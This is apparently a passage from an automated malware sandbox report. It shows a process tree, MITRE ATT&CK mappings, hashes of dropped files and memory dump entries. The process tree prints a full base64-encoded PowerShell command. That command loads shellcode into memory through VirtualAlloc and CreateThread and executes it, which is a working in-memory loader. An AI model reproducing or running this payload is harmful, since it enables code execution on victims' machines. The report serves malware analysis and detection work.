    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2804
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JAA4AEEAMgBCACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAOABBADIAQgAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiADgALAAwAHgAMgA1ACwAMAB4ADQAYQAsADAAeAA4AGIALAAwAHgAZQAwACwAMAB4AGQAYgAsADAAeABjAGMALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAZQAsADAAeAAyADkALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADQANgAsADAAeAAxADIALAAwAHgAMAAzACwAMAB4ADQANgAsADAAeAAxADIALAAwAHgAOAAzACwAMAB4AGMAYgAsADAAeABiADYALAAwAHgANgA5ACwAMAB4ADEANQAsADAAeABlAGYALAAwAHgAYQBmACwAMAB4AGUAMQAsADAAeABkADYALAAwAHgAMABmACwAMAB4ADMAMAAsADAAeAA5AGUALAAwAHgAZQA3ACwAMAB4AGQAZAAsADAAeABiADkALAAwAHgAYgBiACwAMAB4ADYAYwAsADAAeAA2AGEALAAwAHgAZQBiACwAMAB4ADcAMwAsADAAeABlADYALAAwAHgAMwBlACwAMAB4ADAAMAAsADAAeABmAGYALAAwAHgAYQBhACwAMAB4AGEAYQAsADAAeAAxADcALAAwAHgANAA4ACwAMAB4ADAAMAAsADAAeABmADQALAAwAHgAYQBjACwAMAB4AGMANAAsADAAeABiAGQALAAwAHgAYwA5ACwAMAB4ADQAZAAsADAAeAAxADkALAAwAHgANwBlACwAMAB4ADgANQAsADAAeAA4AGUALAAwAHgAMwBiACwAMAB4ADAAMgAsADAAeABkADcALAAwAHgAYwAyACwAMAB4ADkAYgAsADAAeAAzAGIALAAwAHgAMQA4ACwAMAB4ADEANwAsADAAeABkAGQALAAwAHgANwBjACwAMAB4AGUAZgAsADAAeAA1AGQALAAwAHgAMwAyACwAMAB4AGQAMAAsADAAeABiADgALAAwAHgAMQA2ACwAMAB4ADkAZQAsADAAeABjADUALAAwAHgAYwBkACwAMAB4ADYAYgAsADAAeAAyADMALAAwAHgAZQA3ACwAMAB4ADAAMQAsADAAeABlADAALAAwAHgAMQBiACwAMAB4ADkAZgAsADAAeAAyADQALAAwAHgAMwA3ACwAMAB4AGUAZgAsADAAeAAxADMALAAwAHgAMgA3ACwAMAB4ADYAOAAsADAAeAA5AGIALAAwAHgAZgA0ACwAMAB4ADAANwAsADAAeABkADgALAAwAHgAMQA3ACwAMAB4ADQAYwAsADAAeAA1AGYALAAwAHgAZAA5ACwAMAB4AGYANAAsADAAeABjADgALAAwAHgAOQA2ACwAMAB4AGEAZAAsADAAeABjADYALAAwAHgAZQAzACwAMAB4AGQANwAsADAAeAAwADcALAAwAHgAYgBjACwAMAB4ADMAMAAsADAAeABhAGMALAAwAHgAOQA5ACwAMAB4ADEANAAsADAAeAAwADkALAAwAHgANwAyACwAMAB4ADMANQAsADAAeAA1ADkALAAwAHgAYQA1ACwAMAB4ADcAZgAsADAAeAA0ADcALAAwAHgAOQBkACwAMAB4ADAAMgAsADAAeAA5AGYALAAwAHgAMwAyACwAMAB4AGQANQAsADAAeAA3ADAALAAwAHgAMgAyACwAMAB4ADQANQAsADAAeAAyAGUALAAwAHgAMABhACwAMAB4AGYAOAAsADAAeABjADAALAAwAHgAYgAxACwAMAB4AGEAYwAsADAAeAA4AGIALAAwAHgANwAzACwAMAB4ADEANgAsADAAeAA0AGMALAAwAHgANQA4ACwAMAB4AGUANQAsADAAeABkAGQALAAwAHgANAAyACwAMAB4ADEANQAsADAAeAA2ADEALAAwAHgAYgA5ACwAMAB4ADQANgAsADAAeABhADgALAAwAHgAYQA2ACwAMAB4AGIAMQAsADAAeAA3ADMALAAwAHgAMgAxACwAMAB4ADQAOQAsADAAeAAxADYALAAwAHgAZgAyACwAMAB4ADcAMQAsADAAeAA2AGUALAAwAHgAYgAyACwAMAB4ADUAZQAsADAAeAAyADIALAAwAHgAMABmACwAMAB4AGUAMwAsADAAeAAzAGEALAAwAHgAOAA1ACwAMAB4ADMAMAAsADAAeABmADMALAAwAHgAZQAzACwAMAB4ADcAYQAsADAAeAA5ADUALAAwAHgANwBmACwAMAB4ADAAMQAsADAAeAA2AGQALAAwAHgAYQA5ACwAMAB4ADcAZgAsADAAeABkADkALAAwAHgAOQAyACwAMAB4AGYANwAsADAAeAAxADcALAAwAHgAMQA1ACwAMAB4ADUAZQAsADAAeAAwADgALAAwAHgAZQA4ACwAMAB4ADMAMQAsADAAeABlADkALAAwAHgANwBiACwAMAB4AGQAYQAsADAAeAA5AGUALAAwAHgANAAxACwAMAB4ADEANAAsADAAeAA1ADYALAAwAHgANQA2ACwAMAB4ADQAZgAsADAAeABlADMALAAwAHgAZQBmACwAMAB4ADcAMAAsADAAeAA3ADAALAAwAHgAMwBiACwAMAB4ADUANwAsADAAeAAxADAALAAwAHgAOABmACwAMAB4AGIAYwAsADAAeABhADgALAAwAHgAMwA4ACwAMAB4ADQAYgAsADAAeABlADgALAAwAHgAZgA4ACwAMAB4ADUAMgAsADAAeAA3AGEALAAwAHgAOQAxACwAMAB4ADkAMgAsADAAeABhADIALAAwAHgAOAAzACwAMAB4ADQANAAsADAAeAAwAGUALAAwAHgAYQA5ACwAMAB4ADEAMwAsADAAeABhADcALAAwAHgANgA3ACwAMAB4AGEAYwAsADAAeAA4AGQALAAwAHgANABmACwAMAB4ADcAYQAsADAAeABhAGYALAAwAHgANAAwACwAMAB4AGMAYwAsADAAeABmADMALAAwAHgANAA5ACwAMAB4ADMAMgAsADAAeABiAGMALAAwAHgANQAzACwAMAB4AGMANgAsADAAeABmADIALAAwAHgANgBjACwAMAB4ADEANAAsADAAeABiADYALAAwAHgAOQBhACwAMAB4ADYANgAsADAAeAA5AGIALAAwAHgAZQA5ACwAMAB4AGIAYQAsADAAeAA4ADgALAAwAHgANwAxACwAMAB4ADgAMgAsADAAeAA1ADAALAAwAHgANgA3ACwAMAB4ADIAYwAsADAAeABmAGEALAAwAHgAYwBjACwAMAB4ADEAZQAsADAAeAA3ADUALAAwAHgANwAwACwAMAB4ADYAZAAsADAAeABkAGUALAAwAHgAYQAzACwAMAB4AGYAYwAsADAAeABhAGQALAAwAHgANQA0ACwAMAB4ADQAMAAsADAAeAAwADAALAAwAHgANgAzACwAMAB4ADkAZAAsADAAeAAyAGQALAAwAHgAMQAyACwAMAB4ADEAMwAsADAAeAA2AGQALAAwAHgANwA4ACwAMAB4ADQAOAAsADAAeABiADUALAAwAHgANwAyACwAMAB4ADUANgAsADAAeABlADcALAAwAHgAMwA5ACwAMAB4AGUANwAsADAAeAA1AGQALAAwAHgAYQBlACwAMAB4ADYAZQAsADAAeAA5AGYALAAwAHgANQBmACwAMAB4ADkANwAsADAAeAA1ADgALAAwAHgAMAAwACwAMAB4ADkAZgAsADAAeABmADIALAAwAHgAZAAzACwAMAB4ADgAOQAsADAAeAAzADUALAAwAHgAYgBkACwAMAB4ADgAYgAsADAAeABmADUALAAwAHgAZAA5ACwAMAB4ADMAZAAsADAAeAA0AGIALAAwAHgAYQAwACwAMAB4AGIAMwAsADAAeAAzAGQALAAwAHgAMgAzACwAMAB4ADEANAAsADAAeABlADAALAAwAHgANgBkACwAMAB4ADUANgAsADAAeAA1AGIALAAwAHgAMwBkACwAMAB4ADAAMgAsADAAeABjAGIALAAwAHgAYwBlACwAMAB4AGIAZQAsADAAeAA3ADMALAAwAHgAYgA4ACwAMAB4ADUAOQAsADAAeABkADcALAAwAHgANwA5ACwAMAB4AGUANwAsADAAeABhAGUALAAwAHgANwA4ACwAMAB4ADgAMQAsADAAeABjADIALAAwAHgAMgBlACwAMAB4ADQANAAsADAAeAA1ADQALAAwAHgAMgBhACwAMAB4ADQANQAsADAAeABhADQALAAwAHgANgA0ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABoAFoAaQA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAaABaAGkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAGgAWgBpACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2944
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\izczfufh.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2720
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES205.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC204.tmp"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2548

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES205.tmp

Filesize
1KB

MD5
586e3940bb02b08778b4577e54c8e528

SHA1
09e930d8869ec9efc4e615a14d7862c565d9a408

SHA256
dd508f40030fa62c08b7408d7524014622916834c7919f5fa32411e56955756c

SHA512
b4adf90a406c8d779d98a33afd651b3636f975ace030a74bc376a1d80e77a8b8f192296e78174f7ad0841ed8ecab40a3b5d8958ac1436d68d72d9ebabbbc9edf

Download Submit
C:\Users\Admin\AppData\Local\Temp\izczfufh.dll

Filesize
3KB

MD5
31023e2d02c5713d0087b3700623bf45

SHA1
687f57b32f47e262dd7a4dbbc8f337ca4d648b88

SHA256
6dfbbc794e9e87489c4b6405d54d5dc438aab78e9ba1ff93bd4fecbddb9dfd58

SHA512
eedc9ac5b640769ca917bae40cdc90bebb1943e7279c49b0c084645d8f88925fe5bbd1c2fd16305df2215b7400bea6859def66450a8af3b5ce60f66a1f08cd4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\izczfufh.pdb

Filesize
7KB

MD5
a8cf970ac390ce4556e65ca47bc735e2

SHA1
a52e4286dce4bacaf03c6f8b3fff8a6521a6f469

SHA256
991b04d6033a0de0ad99388b9481b9d8f15f5d4933b945f01f6acd1bf3afc4f9

SHA512
2eb3bc0d0dacbbc9321203bfc39284db03a167500c0515741fc2cbdbc4816bfe78150f82526d8bc8770d3d4d9049a82ae7c52fa9c3245e605202c827c80c53e5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DUU0OYVDPRBYXN7UY8AP.temp

Filesize
7KB

MD5
d744c08ddb618223e57ab7ef675917f8

SHA1
74518f4f50e716cd1fa5765dac2b670833da3c92

SHA256
6f5223dfb94353f3cdcd8c99027688ec64db3501057abb37fd44525296c0d882

SHA512
6faf1ccf6a27b4f55caaee91e2871d4253d150105e324a1eaf91e99fca8a3847b97b39d146c9b9cbb831567c0cc114c3eaed3828dde43bfd79d873ebacea25df

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC204.tmp

Filesize
652B

MD5
ad2b595c61cc241777f1044403f32774

SHA1
88a38522fe7ca0fbdebabad284fbcb21a6ee48de

SHA256
71fbdb95461edbfe26bdcc8e3543b4cb1d2e07289f3e57abe18e8cf05dec09af

SHA512
bb6257c11b64ed6018ba07dcb89e0f9bccfa72fb73081f20a43e534ff2506b27399a66969772beb56537f6d55bdd273a230f7fcdb94958fb23fe82b53188ea46

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\izczfufh.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\izczfufh.cmdline

Filesize
309B

MD5
57a13cfb11b57982e04b3e7f7b6d2151

SHA1
c9f29ff1d76cab6ee45809ee008c0d66ca3b8020

SHA256
a7cd8b24d18d0cec458297c465b46fe194e2b706a7ee6022744cac432b73dad5

SHA512
1706b2c71ed3a82be0c4afc693cc0fe2c9414dc4042bd82ad987debbd40d00d3fa7ef73e3e68c6ab0aa099de61d91da8722744a42dacb63edbfbf0fe4824f767

Download Submit
memory/2380-1-0x0000000000C00000-0x0000000000C0A000-memory.dmp

Filesize
40KB

Download
memory/2380-0-0x000007FEF5173000-0x000007FEF5174000-memory.dmp

Filesize
4KB

Download
memory/2380-32-0x000007FEF5173000-0x000007FEF5174000-memory.dmp

Filesize
4KB

Download
memory/2804-7-0x000000001B760000-0x000000001BA42000-memory.dmp

Filesize
2.9MB

Download
memory/2804-10-0x000007FEF3240000-0x000007FEF3BDD000-memory.dmp

Filesize
9.6MB

Download
memory/2804-12-0x000007FEF3240000-0x000007FEF3BDD000-memory.dmp

Filesize
9.6MB

Download
memory/2804-11-0x000007FEF3240000-0x000007FEF3BDD000-memory.dmp

Filesize
9.6MB

Download
memory/2804-8-0x0000000001C20000-0x0000000001C28000-memory.dmp

Filesize
32KB

Download
memory/2804-6-0x000007FEF34FE000-0x000007FEF34FF000-memory.dmp

Filesize
4KB

Download
memory/2804-9-0x000007FEF3240000-0x000007FEF3BDD000-memory.dmp

Filesize
9.6MB

Download
memory/2804-13-0x000007FEF3240000-0x000007FEF3BDD000-memory.dmp

Filesize
9.6MB

Download
memory/2804-33-0x000007FEF34FE000-0x000007FEF34FF000-memory.dmp

Filesize
4KB

Download
memory/2804-34-0x000007FEF3240000-0x000007FEF3BDD000-memory.dmp

Filesize
9.6MB

Download
memory/2944-31-0x0000000005480000-0x0000000005481000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads